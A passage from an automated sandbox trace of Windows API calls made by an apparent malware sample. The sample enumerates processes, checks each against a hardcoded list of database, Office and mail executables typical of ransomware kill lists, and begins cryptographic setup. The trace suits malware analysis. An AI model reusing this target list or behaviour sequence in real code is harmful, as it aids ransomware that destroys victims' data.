cntUsage=0x0, th32ProcessID=0x194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x14c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0066.196] lstrcmpiW (lpString1="msftesql.exe", lpString2="wininit.exe") returned -1 [0066.196] lstrcmpiW (lpString1="sqlagent.exe", lpString2="wininit.exe") returned -1 [0066.196] lstrcmpiW (lpString1="sqlbrowser.exe", lpString2="wininit.exe") returned -1 [0066.196] lstrcmpiW (lpString1="sqlwriter.exe", lpString2="wininit.exe") returned -1 [0066.196] lstrcmpiW (lpString1="oracle.exe", lpString2="wininit.exe") returned -1 [0066.196] lstrcmpiW (lpString1="ocssd.exe", lpString2="wininit.exe") returned -1 [0066.196] lstrcmpiW (lpString1="dbsnmp.exe", lpString2="wininit.exe") returned -1 [0066.196] lstrcmpiW (lpString1="synctime.exe", lpString2="wininit.exe") returned -1 [0066.196] lstrcmpiW (lpString1="agntsvc.exe", lpString2="wininit.exe") returned -1 [0066.196] lstrcmpiW (lpString1="isqlplussvc.exe", lpString2="wininit.exe") returned -1 [0066.196] lstrcmpiW (lpString1="xfssvccon.exe", lpString2="wininit.exe") returned 1 [0066.196] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0066.196] lstrcmpiW (lpString1="mydesktopservice.exe", lpString2="wininit.exe") returned -1 [0066.196] lstrcmpiW (lpString1="ocautoupds.exe", lpString2="wininit.exe") returned -1 [0066.197] lstrcmpiW (lpString1="encsvc.exe", lpString2="wininit.exe") returned -1 [0066.197] lstrcmpiW (lpString1="firefoxconfig.exe", lpString2="wininit.exe") returned -1 [0066.197] lstrcmpiW (lpString1="tbirdconfig.exe", lpString2="wininit.exe") returned -1 [0066.197] lstrcmpiW (lpString1="mydesktopqos.exe", lpString2="wininit.exe") returned -1 [0066.197] lstrcmpiW (lpString1="ocomm.exe", lpString2="wininit.exe") returned -1 [0066.197] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0066.197] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0066.197] lstrcmpiW (lpString1="mysqld-opt.exe", lpString2="wininit.exe") returned -1 [0066.197] lstrcmpiW (lpString1="dbeng50.exe", lpString2="wininit.exe") returned -1 [0066.197] lstrcmpiW (lpString1="sqbcoreservice.exe", lpString2="wininit.exe") returned -1 [0066.197] lstrcmpiW (lpString1="excel.exe", lpString2="wininit.exe") returned -1 [0066.197] lstrcmpiW (lpString1="infopath.exe", lpString2="wininit.exe") returned -1 [0066.197] lstrcmpiW (lpString1="msaccess.exe", lpString2="wininit.exe") returned -1 [0066.197] lstrcmpiW (lpString1="mspub.exe", lpString2="wininit.exe") returned -1 [0066.197] lstrcmpiW (lpString1="onenote.exe", lpString2="wininit.exe") returned -1 [0066.197] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0066.197] lstrcmpiW (lpString1="powerpnt.exe", lpString2="wininit.exe") returned -1 [0066.197] lstrcmpiW (lpString1="steam.exe", lpString2="wininit.exe") returned -1 [0066.197] lstrcmpiW (lpString1="thebat.exe", lpString2="wininit.exe") returned -1 [0066.197] lstrcmpiW (lpString1="thebat64.exe", lpString2="wininit.exe") returned -1 [0066.197] lstrcmpiW (lpString1="thunderbird.exe", lpString2="wininit.exe") returned -1 [0066.197] lstrcmpiW (lpString1="visio.exe", lpString2="wininit.exe") returned -1 [0066.197] lstrcmpiW (lpString1="winword.exe", lpString2="wininit.exe") returned 1 [0066.197] lstrcmpiW (lpString1="wordpad.exe", lpString2="wininit.exe") returned 1 [0066.197] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0066.198] lstrcmpiW (lpString1="msftesql.exe", lpString2="csrss.exe") returned 1 [0066.198] lstrcmpiW (lpString1="sqlagent.exe", lpString2="csrss.exe") returned 1 [0066.198] lstrcmpiW (lpString1="sqlbrowser.exe", lpString2="csrss.exe") returned 1 [0066.198] lstrcmpiW (lpString1="sqlwriter.exe", lpString2="csrss.exe") returned 1 [0066.198] lstrcmpiW (lpString1="oracle.exe", lpString2="csrss.exe") returned 1 [0066.198] lstrcmpiW (lpString1="ocssd.exe", lpString2="csrss.exe") returned 1 [0066.198] lstrcmpiW (lpString1="dbsnmp.exe", lpString2="csrss.exe") returned 1 [0066.198] lstrcmpiW (lpString1="synctime.exe", lpString2="csrss.exe") returned 1 [0066.198] lstrcmpiW (lpString1="agntsvc.exe", lpString2="csrss.exe") returned -1 [0066.198] lstrcmpiW (lpString1="isqlplussvc.exe", lpString2="csrss.exe") returned 1 [0066.198] lstrcmpiW (lpString1="xfssvccon.exe", lpString2="csrss.exe") returned 1 [0066.198] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0066.198] lstrcmpiW (lpString1="mydesktopservice.exe", lpString2="csrss.exe") returned 1 [0066.198] lstrcmpiW (lpString1="ocautoupds.exe", lpString2="csrss.exe") returned 1 [0066.198] lstrcmpiW (lpString1="encsvc.exe", lpString2="csrss.exe") returned 1 [0066.198] lstrcmpiW (lpString1="firefoxconfig.exe", lpString2="csrss.exe") returned 1 [0066.198] lstrcmpiW (lpString1="tbirdconfig.exe", lpString2="csrss.exe") returned 1 [0066.198] lstrcmpiW (lpString1="mydesktopqos.exe", lpString2="csrss.exe") returned 1 [0066.198] lstrcmpiW (lpString1="ocomm.exe", lpString2="csrss.exe") returned 1 [0066.198] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0066.198] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0066.198] lstrcmpiW (lpString1="mysqld-opt.exe", lpString2="csrss.exe") returned 1 [0066.198] lstrcmpiW (lpString1="dbeng50.exe", lpString2="csrss.exe") returned 1 [0066.198] lstrcmpiW (lpString1="sqbcoreservice.exe", lpString2="csrss.exe") returned 1 [0066.199] lstrcmpiW (lpString1="excel.exe", lpString2="csrss.exe") returned 1 [0066.199] lstrcmpiW (lpString1="infopath.exe", lpString2="csrss.exe") returned 1 [0066.199] lstrcmpiW (lpString1="msaccess.exe", lpString2="csrss.exe") returned 1 [0066.199] lstrcmpiW (lpString1="mspub.exe", lpString2="csrss.exe") returned 1 [0066.199] lstrcmpiW (lpString1="onenote.exe", lpString2="csrss.exe") returned 1 [0066.199] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0066.199] lstrcmpiW (lpString1="powerpnt.exe", lpString2="csrss.exe") returned 1 [0066.199] lstrcmpiW (lpString1="steam.exe", lpString2="csrss.exe") returned 1 [0066.199] lstrcmpiW (lpString1="thebat.exe", lpString2="csrss.exe") returned 1 [0066.199] lstrcmpiW (lpString1="thebat64.exe", lpString2="csrss.exe") returned 1 [0066.199] lstrcmpiW (lpString1="thunderbird.exe", lpString2="csrss.exe") returned 1 [0066.199] lstrcmpiW (lpString1="visio.exe", lpString2="csrss.exe") returned 1 [0066.199] lstrcmpiW (lpString1="winword.exe", lpString2="csrss.exe") returned 1 [0066.199] lstrcmpiW (lpString1="wordpad.exe", lpString2="csrss.exe") returned 1 [0066.199] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0066.200] lstrcmpiW (lpString1="msftesql.exe", lpString2="winlogon.exe") returned -1 [0066.200] lstrcmpiW (lpString1="sqlagent.exe", lpString2="winlogon.exe") returned -1 [0066.200] lstrcmpiW (lpString1="sqlbrowser.exe", lpString2="winlogon.exe") returned -1 [0066.200] lstrcmpiW (lpString1="sqlwriter.exe", lpString2="winlogon.exe") returned -1 [0066.200] lstrcmpiW (lpString1="oracle.exe", lpString2="winlogon.exe") returned -1 [0066.200] lstrcmpiW (lpString1="ocssd.exe", lpString2="winlogon.exe") returned -1 [0066.200] lstrcmpiW (lpString1="dbsnmp.exe", lpString2="winlogon.exe") returned -1 [0066.200] lstrcmpiW (lpString1="synctime.exe", lpString2="winlogon.exe") returned -1 [0066.200] lstrcmpiW (lpString1="agntsvc.exe", lpString2="winlogon.exe") returned -1 [0066.200] lstrcmpiW (lpString1="isqlplussvc.exe", lpString2="winlogon.exe") returned -1 [0066.200] lstrcmpiW (lpString1="xfssvccon.exe", lpString2="winlogon.exe") returned 1 [0066.200] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0066.200] lstrcmpiW (lpString1="mydesktopservice.exe", lpString2="winlogon.exe") returned -1 [0066.200] lstrcmpiW (lpString1="ocautoupds.exe", lpString2="winlogon.exe") returned -1 [0066.200] lstrcmpiW (lpString1="encsvc.exe", lpString2="winlogon.exe") returned -1 [0066.200] lstrcmpiW (lpString1="firefoxconfig.exe", lpString2="winlogon.exe") returned -1 [0066.200] lstrcmpiW (lpString1="tbirdconfig.exe", lpString2="winlogon.exe") returned -1 [0066.200] lstrcmpiW (lpString1="mydesktopqos.exe", lpString2="winlogon.exe") returned -1 [0066.200] lstrcmpiW (lpString1="ocomm.exe", lpString2="winlogon.exe") returned -1 [0066.200] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0066.200] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0066.200] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x194, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0066.201] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x194, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0066.202] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.203] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.204] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0066.205] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.205] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.206] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.207] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.208] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.208] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.209] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0066.210] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x420, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.211] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.211] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0066.212] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x678, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.213] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x704, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0066.213] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x77c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0066.214] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0066.215] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0066.216] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0066.216] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0066.217] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x88c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0066.218] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="relationshipcoleman.exe")) returned 1 [0066.219] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="recorder.exe")) returned 1 [0066.219] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shift.exe")) returned 1 [0066.220] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x620, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolute.exe")) returned 1 [0066.221] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="strategic.exe")) returned 1 [0066.222] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="outcomes israeli runtime.exe")) returned 1 [0066.222] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="collecting_vb_les.exe")) returned 1 [0066.223] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x70c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="hazards.exe")) returned 1 [0066.224] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="radarunderground.exe")) returned 1 [0066.225] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nc-statements-inventory.exe")) returned 1 [0066.226] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="returned.exe")) returned 1 [0066.226] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xadc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sweden.exe")) returned 1 [0066.227] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachesprocessingculture.exe")) returned 1 [0066.228] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x784, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="regulatory chevy.exe")) returned 1 [0066.229] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="junctionbaseballsurname.exe")) returned 1 [0066.229] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="boundary.exe")) returned 1 [0066.230] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gaps.exe")) returned 1 [0066.231] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rings_ownership_printable.exe")) returned 1 [0066.232] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reefpunishmentcooking.exe")) returned 1 [0066.232] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ellen rw monica.exe")) returned 1 [0066.234] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="skip-agreements-muscle.exe")) returned 1 [0066.386] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="starts.exe")) returned 1 [0066.387] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="different-ill.exe")) returned 1 [0066.388] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0066.389] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sstojx.exe")) returned 1 [0066.390] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.391] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0066.391] Process32NextW (in: hSnapshot=0x1c0, lppe=0x1e10000 | out: lppe=0x1e10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 0 [0066.392] VirtualFree (lpAddress=0x1e10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.392] CloseHandle (hObject=0x1c0) returned 1 [0066.393] VirtualAlloc (lpAddress=0x0, dwSize=0x114, flAllocationType=0x3000, flProtect=0x4) returned 0x1e10000 [0066.393] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0066.393] CryptAcquireContextW (in: phProv=0x19f9a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x19f9a0*=0x4c6888) returned 1 [0066.615] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0066.615] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0066.615] CryptGenRandom (in: hProv=0x4c6888, dwLen=0x4, pbBuffer=0x19f99c | out: pbBuffer=0x19f99c) returned 1 [0066.615] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0066.615] CryptReleaseContext (hProv=0x4c6888, dwFlags=0x0) returned 1 [0066.615] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x1e30000 [0066.615] wsprintfW (in: param_1=0x19f9c4, param_2="0x%X" | out: param_1="0x8") returned 3 [0066.615] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0066.616] CryptAcquireContextW (in: phProv=0x19f990, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x19f990*=0x4c6888) returned 1 [0066.616] VirtualAlloc (lpAddress=0x0, 